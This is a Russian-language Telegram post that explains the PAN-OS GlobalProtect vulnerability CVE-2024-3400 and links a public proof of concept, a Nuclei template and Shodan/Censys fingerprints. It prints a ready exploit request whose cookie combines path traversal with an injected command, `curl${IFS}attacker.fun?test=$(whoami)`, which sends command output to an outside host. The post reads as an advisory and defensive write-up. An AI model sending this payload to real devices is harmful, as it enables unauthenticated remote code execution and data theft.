avatar
PurpleBear
@purple_medved
18.04.2024 12:29
Детали очередной RCE уязвимости CVE-2024-3400 (оценка по CVSS=10.0) максимально высокого уровня критичности были опубликованы на прошлой неделе. На этот раз отличился Palo Alto Networks - один из мировых лидеров в производстве сетевого оборудования. Эксплуатация 0day RCE уязвимости SSLVPN-решения GlobalProtect Gateway/Portal PAN-OS для получения первоначального доступа в рамках вредоносной кампании Operation MidnightEclipse была обнаружена исследователями из Volexity.

Эксплуатация цепочки уязвимостей позволяет удалённому не аутентифицированному злоумышленнику получить RCE:

✅ Уязвимость Arbitrary File Write позволяет писать в директорию с логами телеметрии /opt/panlogs/tmp/device_telemetry/ с помощью Path Traversal в значении Cookie
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}x1.outboundhost.com`;

✅ Уязвимость Command injection в функциональности кастомной библиотеки pansys.py, которая использует curl для отправки телеметрии с устройства по cron, с использованием модуля subprocess.Popen()
✅ Байпас пробелов с помощью IFS (Internal Field Separator)

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: target.com
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}attacker.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


В России согласно данным Shodan всего 256 хостов пользователей PAN-OS😎, которым необходимо обновиться ASAP

⚙️ POC: https://github.com/0x0d3ad/CVE-2024-3400
🔎 Shodan: http.html_hash:-1303565546
🔎 Censys: services.http.response.body_hash="sha1:28f1cf539f855fff3400f6199f8912908f51e1e1
🔎 Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/b8bbbc5ed5ddbff87fbde649bd2f8a9a576b90c3/http/cves/2024/CVE-2024-3400.yaml
🪲 Уязвимые версии ПО: PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1
Рекомендации: Патчи уже доступны
watchTowr Labs
Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)
Welcome to April 2024, again. We’re back, again. Over the weekend, we were all greeted by now-familiar news—a nation-state was exploiting a “sophisticated” vulnerability for full compromise in yet another enterprise-grade SSLVPN device. We’ve seen all the commentary around the certification process of these devices for certain
🔥 4
👎 1
33 1.8K

Обсуждение 0

Обсуждение не доступно в веб-версии. Чтобы написать комментарий, перейдите в приложение Telegram.

Обсудить в Telegram